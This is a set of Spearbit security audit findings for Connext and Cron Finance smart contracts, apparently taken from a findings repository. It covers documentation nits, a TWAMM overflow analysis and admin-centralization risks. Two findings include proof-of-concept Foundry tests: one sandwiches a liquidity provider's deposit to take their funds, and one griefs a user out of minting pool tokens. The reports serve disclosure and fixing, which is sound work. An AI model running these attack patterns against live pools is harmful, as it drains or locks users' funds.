Severity: Informational Context: TypedMemView.sol#L391 Description: A comment in function typeOf() is inaccurate. It says it is shifting 24 bytes, however it is shifting 216 / 8 = 27 bytes. function typeOf(bytes29 memView) internal pure returns (uint40 _type) { assembly { ... // 216 == 256 - 40 _type := shr(216, memView) // shift out lower 24 bytes } } Recommendation: Change the comment to -_type := shr(216, memView) // shift out lower 24 bytes +_type := shr(216, memView) // shift out lower 27 bytes 149 Connext: Solved in PR 2533. Spearbit: Verified. 
+5.5.84 Missing Natspec documentation in TypedMemView Severity: Informational Context: TypedMemView.sol#L802 Description: unsafeJoin()'s Natspec documentation is incomplete, as the second argument to the function is not documented. Recommendation: Add Natspec for the second argument _location. Here is a suggestion: @param _location The memory location from where the joined view begins. Connext: Solved in PR 2533. Spearbit: Verified.
+5.5.85 Remove irrelevant comments Severity: Informational Context: TypedMemView.sol#L770, SpokeConnector.sol#L499, BridgeFacet.sol#L419 Description: • Instance 1 - TypedMemView.sol#L770: clone() has this comment that seems to be copied from equal(). It is not applicable to clone() and can be deleted. * @dev Shortcuts if the pointers are identical, otherwise compares type and digest. • Instance 2 - SpokeConnector.sol#L499: the function process of SpokeConnector contains comments that are no longer relevant. // check re-entrancy guard // require(entered == 1, "!reentrant"); // entered = 0; • Instance 3 - BridgeFacet.sol#L419: Nomad is no longer used within Connext; however, it is still mentioned in comments within the codebase. * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad * network. Recommendation: Remove or update comments that are no longer relevant. Connext: Solved in PR 2533. Spearbit: Verified.
+5.5.86 Incorrect comment about TypedMemView encoding Severity: Informational Context: TypedMemView.sol#L414 Description: A TypedMemView variable of type bytes29 is encoded as follows: • First 5 bytes encode a type flag. • Next 12 bytes point to a memory address. • Next 12 bytes encode the length of the memory view (in bytes). • Next 3 bytes are empty. When shifting a TypedMemView variable to the right by 15 bytes (120 bits), the encoded length and the empty bytes are removed. Hence, this comment is incorrect: // 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) _loc := and(shr(120, memView), _mask) Recommendation: Apply this diff: -// 120 bits = 12 bytes (the encoded loc) + 3 bytes (empty low space) +// 120 bits = 12 bytes (the encoded len) + 3 bytes (empty low space) Connext: Solved in PR 2533. Spearbit: Verified.
+5.5.87 Constants can be used in assembly blocks directly Severity: Informational Context: ExcessivelySafeCall.sol#L127-L133, TypedMemView.sol#L411-L415, TypedMemView.sol#L443-L446 Description: Yul cannot read global variables, but that is not true for a constant variable, as its value is embedded in the bytecode. The highlighted code above has the following pattern: uint256 _mask = LOW_12_MASK; // assembly can't use globals assembly { // solium-disable-previous-line no-inline-assembly _len := and(shr(24, memView), _mask) } Here, LOW_12_MASK is a constant which can be used directly in the assembly code. Recommendation: Replace the mask variables with the constant variables. Connext: Leaving the same as in the source libraries (TypedMemView.sol#L364: summa-tx-TypedMemView.sol#L396; nomad-ExcessivelySafeCall.sol#L127: summa-tx-). Spearbit: Acknowledged. Although the reason the original library uses variables for constants is that it supports a wide range of Solidity versions; older versions did not support using constants directly in assembly.
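A compilable sketch of the recommendation, assuming a compiler version recent enough to read value-type constants inside assembly (the mask value mirrors a 12-byte LOW_12_MASK; other names are illustrative):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

library ConstantInAssemblySketch {
    uint256 private constant LOW_12_MASK = 0xffffffffffffffffffffffff; // low 12 bytes set

    function lenOf(bytes29 memView) internal pure returns (uint256 _len) {
        assembly {
            // the constant's value is embedded in the bytecode, so no local copy is needed
            _len := and(shr(24, memView), LOW_12_MASK)
        }
    }
}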
+5.5.88 Document source of processMessageFromRoot() Severity: Informational Context: ArbitrumHubConnector.sol#L86-L117 Description: The function processMessageFromRoot() of ArbitrumHubConnector doesn't contain a comment indicating where it is derived from; most other functions have a link to the source. Linking to the source would make the function easier to verify and maintain. Recommendation: Add a comment about where processMessageFromRoot() is derived from. This seems to be: • confirmNode() RollupCore.sol#L269-L285. • executeTransaction() Outbox.sol#L123-L147. Connext: Acknowledged. Spearbit: Acknowledged.
+5.5.89 Be aware of zombies Severity: Informational Context: ArbitrumHubConnector.sol#L119-L138, Node.sol#L20-L23 Description: The function _validateSendRoot() of ArbitrumHubConnector checks that stakerCount and childStakerCount are larger than 0. The definitions of stakerCount and childStakerCount document that they could include zombies. It's not immediately clear what zombies are, but it might be relevant to consider them. contract ArbitrumHubConnector is HubConnector { function _validateSendRoot(...) ... { ... require(node.stakerCount > 0 && node.childStakerCount > 0, "!staked"); } } // Number of stakers staked on this node. This includes real stakers and zombies uint64 stakerCount; // Number of stakers staked on a child node. This includes real stakers and zombies uint64 childStakerCount; Recommendation: Double check whether zombies have to be taken into account. Connext: Zombies are stakers that have lost their disputes (source). We can check for zombies, but because the challenge periods don't align it doesn't fully protect us (i.e. because we don't wait the 7 days, a staker who wasn't a zombie could become one). Instead, we take the weaker assumption that someone has built on the node. Spearbit: Acknowledged.
+5.5.90 Readability of proveAndProcess() Severity: Informational Context: SpokeConnector.sol#L330-L365 Description: The function proveAndProcess() is relatively difficult to understand because it first processes the case i == 0 and then loops over i == 1..._proofs.length. function proveAndProcess(...) ... { ... bytes32 _messageHash = keccak256(_proofs[0].message); bytes32 _messageRoot = calculateMessageRoot(_messageHash, _proofs[0].path, _proofs[0].index); proveMessageRoot(_messageRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); messages[_messageHash] = MessageStatus.Proven; for (uint32 i = 1; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); require(_calculatedRoot == _messageRoot, "!sharedRoot"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... } Recommendation: Consider integrating the 0 case within the loop to make the code more readable. The following example costs slightly more gas; other variations that cost less gas are also possible but will likely be less readable: function proveAndProcess(...) ... { ... bytes32 _messageHash; bytes32 _messageRoot; for (uint32 i = 0; i < _proofs.length; ) { _messageHash = keccak256(_proofs[i].message); bytes32 _calculatedRoot = calculateMessageRoot(_messageHash, _proofs[i].path, _proofs[i].index); if (i == 0) { proveMessageRoot(_calculatedRoot, _aggregateRoot, _aggregatePath, _aggregateIndex); _messageRoot = _calculatedRoot; } require(_calculatedRoot == _messageRoot, "!sharedRoot"); messages[_messageHash] = MessageStatus.Proven; unchecked { ++i; } } ... } Connext: Acknowledged.
Spearbit: Acknowledged.
+5.5.91 Readability of checker() Severity: Informational Context: SendOutboundRootResolver.sol#L32-L42 Description: The function checker() is relatively difficult to read due to the else-if chaining of the if statements. As the if statements call return(), the else isn't necessary and the code can be made more readable. function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) { return (false, bytes("EXECUTION_INTERVAL seconds are not passed yet")); } else if (lastRootSent == outboundRoot) { return (false, bytes("Sent root is the same as the current root")); } else { execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } } Recommendation: Consider changing the code to something like this: function checker() external view override returns (bool canExec, bytes memory execPayload) { bytes32 outboundRoot = CONNECTOR.outboundRoot(); if ((lastExecuted + EXECUTION_INTERVAL) > block.timestamp) return (false, bytes("EXECUTION_INTERVAL seconds are not passed yet")); if (lastRootSent == outboundRoot) return (false, bytes("Sent root is the same as the current root")); execPayload = abi.encodeWithSelector(this.sendMessage.selector, outboundRoot); return (true, execPayload); } Connext: SendOutboundRootResolver.sol is removed in PR 2199. Spearbit: Verified.
+5.5.92 Use function addressToBytes32 Severity: Informational Context: SpokeConnector.sol#L282-L289, TypeCasts.sol#L31-L33 Description: The function dispatch() of SpokeConnector contains an explicit conversion from address to bytes32. There is also a function addressToBytes32() that does the same and is more readable. function dispatch(...) ... { bytes memory _message = Message.formatMessage( ... bytes32(uint256(uint160(msg.sender))), ... ); Recommendation: Use the function addressToBytes32: -bytes32(uint256(uint160(msg.sender))), +addressToBytes32(msg.sender), Connext: Fixed in PR 2522. Spearbit: Verified.
6 Appendix: Architecture
diff --git a/findings_newupdate/spearbit/CronFinance-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/CronFinance-Spearbit-Security-Review.txt new file mode 100644 index 0000000..3d225d0 --- /dev/null +++ b/findings_newupdate/spearbit/CronFinance-Spearbit-Security-Review.txt @@ -0,0 +1,36 @@
+5.1.1 Balancer Read-Only Reentrancy Vulnerability (Changes from dev team added to audit.) Severity: High Risk Context: CronV1Pool.sol#L1250 Description: Balancer's read-only reentrancy vulnerability potentially affects the following Cron-Fi TWAMM functions: • getVirtualReserves • getVirtualPriceOracle • executeVirtualOrdersToBlock A mitigation was provided by the Balancer team that uses a minimum amount of gas to trigger a reentrancy check. The Balancer vulnerability is discussed in greater detail here: • reentrancy-vulnerability-scope-expanded/4345 Recommendation: Install the mitigation into the aforementioned methods, changing them to non-view functions but documenting that they do not meaningfully modify state. If possible, confirm that the mitigation is not needed by testing the methods without it, and remove it if shown to not be a problem. Twamm: Addressed in commit 5a529da. Spearbit: Verified.
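For reference, the Balancer-provided mitigation mentioned above matches the pattern Balancer later published as VaultReentrancyLib; the following is a hedged sketch of that check (simplified interface, plain require instead of Balancer's _require helper):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

interface IVaultMinimal {
    struct UserBalanceOp { uint8 kind; address asset; uint256 amount; address sender; address payable recipient; }
    function manageUserBalance(UserBalanceOp[] calldata ops) external payable;
}

library VaultReentrancyCheckSketch {
    // Staticcall manageUserBalance with a small gas stipend: if the Vault is mid-operation,
    // its reentrancy guard reverts with BAL#400, which we detect and reject here.
    function ensureNotInVaultContext(IVaultMinimal vault) internal view {
        bytes32 reentrancyErrorHash = keccak256(abi.encodeWithSignature("Error(string)", "BAL#400"));
        (, bytes memory revertData) = address(vault).staticcall{ gas: 10_000 }(
            abi.encodeWithSelector(IVaultMinimal.manageUserBalance.selector, 0)
        );
        require(keccak256(revertData) != reentrancyErrorHash, "Vault reentrancy");
    }
}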
+5.1.2 Overpayment of one side of LP Pair onJoinPool due to sandwich or user error Severity: High Risk Context: CronV1Pool.sol#L2048-L2051 Description: Only one of the two incoming tokens is used to determine the amount of pool tokens minted (amountLP) on join: amountLP = Math.min( _token0InU112.mul(supplyLP).divDown(_token0ReserveU112), _token1InU112.mul(supplyLP).divDown(_token1ReserveU112) ); In the event the price moves between the time a minter sends their transaction and when it is included in a block, they may overpay for one of _token0InU112 or _token1InU112. This can occur due to user error, or due to being sandwiched. Concrete example: pragma solidity ^0.7.0; pragma experimental ABIEncoderV2; import "forge-std/Test.sol"; import "../HelperContract.sol"; import { C } from "../../Constants.sol"; import { ExecVirtualOrdersMem } from "../../Structs.sol"; contract JoinSandwich is HelperContract { uint256 WAD = 10**18; function testManualJoinSandwich() public { address userA = address(this); address userB = vm.addr(1323); // Add some base liquidity from the future attacker. addLiquidity(pool, userA, userA, 10**7 * WAD, 10**7 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userA), 10**7 * WAD - C.MINIMUM_LIQUIDITY); // Give userB some tokens to LP with. token0.transfer(userB, 1_000_000 * WAD); token1.transfer(userB, 1_000_000 * WAD); addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); assertEq(CronV1Pool(pool).balanceOf(userB), 10**6 * WAD); exit(10**6 * WAD, ICronV1Pool.ExitType(0), pool, userB); assertEq(CronV1Pool(pool).balanceOf(userB), 0); // Full amounts are returned b/c the exit penalty has been removed (as is being done anyway). assertEq(token0.balanceOf(userB), 1_000_000 * WAD); assertEq(token1.balanceOf(userB), 1_000_000 * WAD); // Now we'll do the same thing, simulating a sandwich from userA. uint256 swapProceeds = swapPoolAddr(5 * 10**6 * WAD, /* unused */ 0, ICronV1Pool.SwapType(0), address(token0), pool, userA); // Original tx from userB is sandwiched now... addLiquidity(pool, userB, userB, 10**6 * WAD, 10**6 * WAD, 0); // Sell back what was gained from the first swap. swapProceeds = swapPoolAddr(swapProceeds, /* unused */ 0, ICronV1Pool.SwapType(0), address(token1), pool, userA); emit log_named_uint("swapProceeds 1 to 0", swapProceeds); // allows seeing what userA lost to fees // Let's see what poor userB gets back of their million token0 and million token1... assertEq(token0.balanceOf(userB), 0); assertEq(token1.balanceOf(userB), 0); exit(ICronV1Pool(pool).balanceOf(userB), ICronV1Pool.ExitType(0), pool, userB); emit log_named_uint("userB token0 after", token0.balanceOf(userB)); emit log_named_uint("userB token1 after", token1.balanceOf(userB)); } } Output: Logs: swapProceeds 1 to 0: 4845178856516554015932796 userB token0 after: 697176321467715374004199 userB token1 after: 687499999999999999999999 1. We have a pool where the attacker is all of the liquidity (10^7 of each token). 2. An LP tries to deposit another 10^6 in equal proportions. 3. The attacker uses a swap of 5 * 10^6 of one of the tokens to distort the pool. They lose about 155k in the process, but the LP loses far more, nearly all of which goes to the attacker: about 615,324 (the sum of the losses of the two tokens, since they're equally priced in this example). The attacker could be a significantly smaller proportion of the pool and still find this attack profitable. They could also JIT the liquidity since the early withdrawal penalty has been removed.
The attack becomes infeasible for very large pools (it has to happen over multiple transactions, so a flash loan cannot be used and the attacker needs their own capital), but it is relevant in practice. Recommendation: Allow LPs to specify a slippage tolerance on both join and exit. An example of this is uniswap/v2-periphery/UniswapV2Router02.sol, where slippage protection is added both when adding and when removing liquidity. Twamm: Addressed in commit e0e5fb4. Followed recommendation for onJoin, adding minimum price arguments to allow users to specify asymmetric limits if desired. However, for the exit use case (i.e. an exit price attack), the existing Balancer scaffolding wrapping our pool provides minimum exit amounts that revert the exit unless at least a specified number of tokens is received. To ensure this works with our pool, I added a test loosely based on yours with a non-sensical price attack to illustrate that users can reject liquidation during undesirable price movements (see function testAutoExitProtectedAgainstSandwichMovement in contracts/twault/test/auto/LiquidityAttackAuto.t.sol, which manipulates price, specifies minimums and is reverted with BAL#505). Spearbit: Confirmed.
+5.1.3 Loss of Long-Term Swap Proceeds Likely in Pools With Decimal or Price Imbalances Severity: High Risk Context: VirtualOrders.sol#L166 Description: This TWAMM implementation tracks the proceeds of long-term swaps efficiently via accumulated values called "scaled proceeds" for each token. In every order block interval (OBI), the scaled proceeds for e.g. the sale of token 0 are incremented by (quantity of token 1 purchased during the OBI) * 2^64 / (sales rate of token 0 during the OBI). Then the proceeds of any specific long-term swap can be computed as the product of the order's sales rate and the difference between the scaled proceeds at the current block (or the expiration block of the order if filled) and at the last block for which proceeds were claimed for the order, divided by 2^64: last := min(currentBlock, orderExpiryBlock); prev := block of last proceeds collection, or block the order was placed in if this is the first withdrawal; LT swap proceeds = (scaledProceeds_last - scaledProceeds_prev) * (order sales rate) / 2^64. The value 2^64 is referred to as the "scaling factor" and is intended to reduce precision loss in the division that determines the increment to the scaled proceeds. The addition to increment the scaled proceeds and the subtraction to compute its net change are both intentionally done with unchecked arithmetic: since only the difference matters, so long as at most one overflow occurs between claim-of-proceeds events for any given order, the computed proceeds will be correct (up to rounding errors). If two or more overflows occur, however, funds will be lost by the swapper (unclaimable and locked in the contract). Additionally, to cut down on gas costs, the scaled proceeds for the two tokens are packed into a single storage slot, so that only 128 bits are available for each value. This makes multiple overflows within the lifetime of a single order more likely. The CronFi team was aware of this at the start of the audit and specifically requested it be investigated, though they expected a maximum order length of 5 years to be sufficient to avoid the issue in practice. The scaling factor of 2^64 is approximately 1.8 * 10^19, close to the unit size of an 18-decimal token.
It indeed works well if both pool tokens have similar decimals and relative prices that do not differ by too many orders of magnitude, as the quantity purchased and the sales rate will then be of similar magnitude, canceling to within a few powers of ten (2^128 is about 3.4 * 10^38, leaving around 19 orders of magnitude after accounting for the scaling factor). However, in pools with large disparities in price, decimals, or both, numerical issues are easy to encounter. The most extreme realistic example would be a DAI-GUSD pool. DAI has 18 decimals while GUSD has only 2. We will treat the prices of DAI and GUSD as equal for this analysis, as they are both stablecoins, and arbitrage of the TWAMM pool should prevent large deviations. Selling GUSD at a rate of 1000 per block, with an OBI of 64 (the stable pool order block interval in the audited commit), results in an increment of the scaled proceeds per OBI of: increment = (64 * 1000 * 10^18) * 2^64 / (1000 * 10^2) = 1.18 * 10^37. This will overflow an unsigned 128 bit integer after 29 OBIs; at 12 seconds per block, this means the first overflow occurs after 12 * 64 * 29 = 22272 seconds, or about 6.2 hours, and thus the first double overflow (and hence irrevocable loss of proceeds if a withdrawal is not executed in time) will occur within about 12.4 hours (slightly but not meaningfully longer if the price is pushed a bit below 1:1, assuming a deep enough pool or reasonably efficient arbitrage). Since the TWAMM is intended to support swaps that take days, weeks, months, or even years to fill, without requiring constant vigilance from every long-term swapper, this is a strong violation of safety. A less extreme but more market-relevant example would be a DAI-WBTC pool. WBTC has 8 instead of 2 decimals, but it is also more than four orders of magnitude more valuable per token than DAI, making it only about 2 orders of magnitude "safer" than a DAI-GUSD pool. Imitating the above calculation with 20_000 DAI = 1 WBTC and selling 0.0025 WBTC (~$50) per block with a 257 block OBI yields: increment = (257 * 50 * 10^18) * 2^64 / (0.0025 * 10^8) = 9.48 * 10^35; OBIs to overflow = ceiling(2^128 / (9.48 * 10^35)) = 359; time to overflow = 12 * 257 * 359 = 1107156 seconds = 307 hours = 12.8 days, with roughly double that to encounter the second overflow. While less bad than the DAI-GUSD example, this is still likely of significant concern given that the CronFi team indicated these are parameters under which the TWAMM should be able to function safely, and DAI-WBTC is a pair of interest for the v1 product. It is worth noting that these calculations are not directly dependent on the quantity being sold so long as the price stays roughly constant: any change in the selling rate will be compensated by a proportional change in the proceeds quantity, as their ratio is determined by price. Thus the analysis depends only on relative price and relative decimals, to a good approximation, so a WBTC-DAI pool can be expected to experience an overflow roughly every two weeks at prevailing market prices, so long as the net selling rate is non-zero. Recommendation: Consider adjusting the scaling factor based on the relative decimals of the two tokens (this will result in two different scaling factors per pool); a sketch follows below. The lower the selling rate in absolute terms, the smaller the factor needed to avert serious precision loss.
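One possible shape of that adjustment, as a hedged sketch (names and the exact factor policy are hypothetical and would need validation against expected price ranges): shrink the 2^64 base factor when the sold token has fewer decimals than the purchased token, and grow it in the opposite case, so that proceeds * factor / salesRate stays well inside 128 bits:

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

library ScalingFactorSketch {
    // factor applied when selling a token with soldDecimals for one with proceedsDecimals
    function scalingFactor(uint8 soldDecimals, uint8 proceedsDecimals) internal pure returns (uint256) {
        if (soldDecimals >= proceedsDecimals) {
            // sold token has more decimals: the sales rate is large, so enlarge the factor
            return (uint256(1) << 64) * (10 ** uint256(soldDecimals - proceedsDecimals));
        }
        // sold token has fewer decimals (e.g. GUSD sold for DAI): shrink the factor
        return (uint256(1) << 64) / (10 ** uint256(proceedsDecimals - soldDecimals));
    }
}

Under this sketch, the DAI-GUSD example's increment drops from about 1.18 * 10^37 to about 1.18 * 10^21 per OBI, pushing the first overflow out by sixteen orders of magnitude.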
Adjusting the scaling factor this way is similar in effect to scaling all balances to, say, 18 decimals, but should be simpler to implement. Highly imbalanced prices are still a risk, but these are unlikely to be as extreme as the differences that arise from unequal decimals. The scaling factor could be made configurable upon pool creation to allow an adjustment for price as well as decimals, although if prices diverge significantly after creation, there is likely no other option than abandoning a pool (as retroactively correcting scaled proceeds would be cost-prohibitive). Alternatively, separate 256-bit containers can be used to store the scaled proceeds, although this will greatly increase the gas costs of virtual order execution. Twamm: Addressed in the following commits: faf1d5e, bfb6a5c, 162461a. Spearbit: Verified.
+5.1.4 An attacker can block any address from joining the Pool and minting BLP Tokens by filling the joinEventMap mapping. Severity: High Risk Context: JoinEventLib.sol#L65-L137, Constants.sol#L112 Description: An attacker can block any address from minting BLP Tokens. This occurs due to the MAX_JOIN_EVENTS limit, which is present in the JoinEventLib library. The goal for an attacker is to block a legitimate user from minting BLP Tokens by filling the joinEventMap mapping. The attacker can fill the joinEventMap mapping by performing the following steps: • The attacker mints BLP Tokens from 50 different addresses. • Each address transfers the BLP Tokens, alongside the join events, to the targeted user with a call to the CronV1Pool(pool).transfer and CronV1Pool(pool).transferJoinEvent functions respectively. Those transfers should happen in different blocks. After 50 blocks (50 * 12s = 10 minutes) the attacker has blocked the legitimate user from minting BLP Tokens, as the maximum size of the joinEventMap mapping has been reached. The impact of this vulnerability can be significant, particularly for smart contracts that allow users to earn yield by providing liquidity in third-party protocols. For example, if a governance proposal is initiated to generate yield by providing liquidity in a CronV1Pool pool, the attacker could prevent the third-party protocol from integrating with the CronV1Pool protocol. A proof-of-concept exploit demonstrating this vulnerability can be found below: function testGriefingAttack() public { console.log("-----------------------------"); console.log("Many Users mint BLP tokens and transfer the join events to the user 111 in order to fill the array!"); for (uint j = 1; j < 51; j++) { _addLiquidity(pool, address(j), address(j), 2_000, 2_000, 0); vm.warp(block.timestamp + 12); vm.startPrank(address(j)); //transfer the tokens CronV1Pool(pool).transfer(address(111), CronV1Pool(pool).balanceOf(address(j))); //transfer the join events to the address(111) CronV1Pool(pool).transferJoinEvent(address(111), 0, CronV1Pool(pool).balanceOf(address(j))); vm.stopPrank(); } console.log("Balance of address(111) before minting LP Tokens himself", ICronV1Pool(pool).balanceOf(address(111))); //user(111) wants to enter the pool _addLiquidity(pool, address(111), address(111), 5_000, 5_000, 0); console.log("Join Events of user address(111): ", ICronV1Pool(pool).getJoinEvents(address(111)).length); console.log("Balance of address(111) after adding the liquidity: ", ICronV1Pool(pool).balanceOf(address(111))); } Recommendation: A possible mitigation could be to override the _move function of the BalancerPoolToken contract so that it also transfers the joinEvents alongside the BLP tokens, as sketched below.
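A heavily hedged sketch of that mitigation (the helper and its bookkeeping are hypothetical; the real fix must decide how join events map onto partial balance transfers):

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

abstract contract JoinEventMoveSketch {
    // _move is BalancerPoolToken's internal transfer hook in the audited version.
    function _move(address sender, address recipient, uint256 amount) internal virtual {
        _moveJoinEvents(sender, recipient, amount);
        // ... existing BPT balance bookkeeping would follow here via the parent's _move
    }

    // Hypothetical helper: relocate join events covering `amount` BPT so the recipient
    // never needs a separate transferJoinEvent call (and the MAX_JOIN_EVENTS cap
    // cannot be weaponized by third-party senders).
    function _moveJoinEvents(address sender, address recipient, uint256 amount) internal virtual;
}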
Twamm: Join Event / Holding Period & Penalty completely removed in commit 3130e41. Spearbit: Verified.
+5.1.5 The executeVirtualOrdersToBlock function updates the oracle with the wrong block.number Severity: High Risk Context: CronV1Pool.sol#L1130 Description: The executeVirtualOrdersToBlock function is external, meaning anyone can call it to execute virtual orders. The _maxBlock parameter can be lower than block.number, which will make the oracle malfunction: the oracle update function _updateOracle uses block.timestamp and assumes that the update was called with the reserves at the current block, so the oracle is updated with an incorrect value whenever _maxBlock is lower than block.number. Recommendation: Consider adding the block number as a parameter within _updateOracle so that this function does not rely on the current block. Twamm: Addressed in commit f324de7. Spearbit: Verified.
5.2 Low Risk
+5.2.1 The _join function does not check if the recipient is address(0) Severity: Low Risk Context: CronV1Pool.sol#L2055 Description: As stated within Balancer's PoolBalances.sol: // The Vault ignores the `recipient` in joins and the `sender` in exits: it is up to the Pool to keep track of // their participation. The recipient is not checked against address(0); that check should happen within the pool implementation. Within the Cron implementation this check is missing, which can cause losses for LPs if the recipient is sent as address(0). This can have a high impact if a 3rd party integrates with the Cron pool and the "joiner" mistakenly sends address(0). It becomes more dangerous if the 3rd party is a smart contract implementation that connects with the Cron pool, as the default value for an address is address(0), so the probability of this issue occurring increases. Recommendation: Add a check that the recipient is not address(0). Twamm: Addressed in commit 370a0d3a. Spearbit: Verified.
+5.2.2 Canonical token pairs can be griefed by deploying new pools with malicious admins Severity: Low Risk Context: CronV1PoolFactory.sol#L63 Description: function create( address _token0, address _token1, string memory _name, string memory _symbol, uint256 _poolType, address _pauser ) external returns (address) { CronV1Pool.PoolType poolType = CronV1Pool.PoolType(_poolType); requireErrCode(_token0 != _token1, CronErrors.IDENTICAL_TOKEN_ADDRESSES); (address token0, address token1) = _token0 < _token1 ? (_token0, _token1) : (_token1, _token0); requireErrCode(token0 != address(0), CronErrors.ZERO_TOKEN_ADDRESSES); requireErrCode(getPool[token0][token1][_poolType] == address(0), CronErrors.EXISTING_POOL); address pool = address( new CronV1Pool(IERC20(_token0), IERC20(_token1), getVault(), _name, _symbol, poolType, address(this), _pauser) ); //... Anyone can permissionlessly deploy a pool, with it then becoming the canonical pool for that pair of tokens. An attacker is able to pass a malicious _pauser to the twamm pool, preventing the creation of a legitimate pool of the same type and tokens. This results in race conditions between altruistic and malicious pool deployers to set the admin for every token pair.
Malicious actors may grief the protocol by deploying token pairs and exploiting the admin address: deploying the pool in a paused state (effectively disabling trading for long-term swaps with the pool), pausing the pool at an unknown point in the future, setting fee and holding penalty parameters to inappropriate values, or setting illegitimate arbitrage partners and lists. If the griefing is successful, this requires the factory owner to remove the admin of each pool individually and to set a new admin address, fee parameters, holding periods, pause state, and arbitrage partners in order to recover each pool to a usable condition. Recommendation: Remove the user-defined _pauser parameter from pool creation and pass a default admin address to every pool on creation. Keep in mind that this default admin address is a singular point of centralization for the protocol. Consider deploying a Cron Finance governance address. Twamm: Addressed in commit 987f539. Created a 2/3 multisig safe that is the factory owner and default pool admin. Spearbit: Verified.
+5.2.3 Refund Computation in _withdrawLongTermSwap Contains A Risky Underflow Severity: Low Risk Context: CronV1Pool.sol#L1937 Description: Nothing prevents lastVirtualOrderBlock from advancing beyond the expiry of any given long-term swap, so the unchecked subtraction here is unsafe and can underflow. Since the resulting refund value will be extremely large due to the limited number of blocks that can elapse and the typical prices and decimals of tokens, the practical consequence will be a revert due to exceeding the pool and order balances. However, this could be used to steal funds if the value could be maliciously tuned, for example via another hypothetical bug that allowed the last virtual order block or the sales rate of an order to be manipulated to an arbitrary value. Recommendation: Prevent the underflow in some way, either by explicitly checking for and reverting on attempts to cancel expired (i.e. filled) orders, or by adding logic to skip the refund calculation when expired orders are canceled. Twamm: Fixed in commit 8e52bfa. Spearbit: Verified.
+5.2.4 Function transferJoinEvent Permits Transfer-to-Self Severity: Low Risk Context: JoinEventLib.sol#L71 Description: Though the error code indicates the opposite intent, this check will permit transfer-to-self (|| used instead of &&). Recommendation: Use && instead of ||. Twamm: Obsolete (join event logic removed). Spearbit: Verified.
+5.2.5 One-step owner change for factory owner Severity: Low Risk Context: CronV1PoolFactory.sol#L77 Description: The factory owner can be changed with a single transaction. As the factory owner is critical to managing the pool fees and other settings, an incorrect address being set as the owner may result in unintended behavior. Recommendation: Consider implementing a two-step pattern for ownership changes; a sketch follows 5.2.6 below. Twamm: Resolved in commit 26058f7. Spearbit: Verified. Note that a one-step change is still possible using the _direct bool. However, the issue is mitigated.
+5.2.6 Factory owner may front run large orders in order to extract fees Severity: Low Risk Context: CronV1Pool.sol#L1002, CronV1Pool.sol#L1531 Description: The factory owner may be able to front-run large trades in order to extract more fees if compromised or otherwise turned malicious. Similarly, pausing may also allow for skipping the execution of virtual orders before exiting. Recommendation: It is recommended to enforce that the factory owner is a 2/3 multisig.
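The two-step ownership pattern recommended in 5.2.5 above can be sketched as follows (a minimal standalone illustration; OpenZeppelin's Ownable2Step provides an audited equivalent):

// SPDX-License-Identifier: MIT
pragma solidity ^0.7.0;

contract TwoStepOwnedSketch {
    address public owner;
    address public pendingOwner;

    constructor() { owner = msg.sender; }

    function transferOwnership(address newOwner) external {
        require(msg.sender == owner, "not owner");
        pendingOwner = newOwner; // nothing changes until the new owner accepts
    }

    function acceptOwnership() external {
        require(msg.sender == pendingOwner, "not pending owner");
        owner = pendingOwner; // a mistyped address can never complete this step
        pendingOwner = address(0);
    }
}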
Twamm: Addressed in commit 987f539. Created a 2/3 multisig safe that is the factory owner and default pool admin. Spearbit: Verified.
+5.2.7 Join Events must be explicitly transferred to the recipient after transferring Balancer Pool Tokens in order to realize the full value of the tokens Severity: Low Risk Context: CronV1Pool.sol#L1116 Description: Any user receiving transferred LP tokens must also be explicitly transferred a join event in order to redeem the full value of the LP tokens on exit; otherwise the receiving address will automatically incur the holding penalty when it tries to exit the pool. Unless a protocol specifically implements transferJoinEvent function compatibility, all LP tokens going through that protocol will be worth a fraction of their true value even after the holding period has elapsed. Recommendation: Consider using OZ transfer hooks or overriding the balancer pool token's transfer function to automatically transfer joinEvents on token transfer, although this may increase the gas cost of an LP token transfer. Twamm: Fixed. Join Event / Holding Period & Penalty completely removed in commit 3130e41. Spearbit: Verified.
+5.2.8 Order Block Intervals (OBI) and Max Intervals are calculated with 14 second instead of 12 second block times Severity: Low Risk Context: Constants.sol#L100-L107, CronV1Pool.sol#L1783-L1789, CronV1Pool.sol#L100, VirtualOrders.sol#L382 Description: The CronV1Pool contract calculates both the Order Block Intervals (OBI) and the Max Intervals of the Stable/Liquid/Volatile pairs with 14 second block times. However, after the merge, a 12 second block time is enforced by the Beacon Chain. Recommendation: It is recommended to calculate the Order Block Intervals (OBI) and the Max Intervals with 12 second block times. Twamm: Addressed in commit 74a4796 and commit ac2280a5. Spearbit: Verified.
+5.2.9 One-step status change for pool Admins Severity: Low Risk Context: CronV1Pool.sol#L864 Description: Admin status can be changed in a single transaction. This may result in unintended behaviour if an incorrect address is passed. Recommendation: Consider implementing a two-step pattern. Twamm: Acknowledged. We can always reset the admin in case the wrong address gets set, so a 2-step process might be overkill and will increase contract size. Spearbit: Acknowledged.
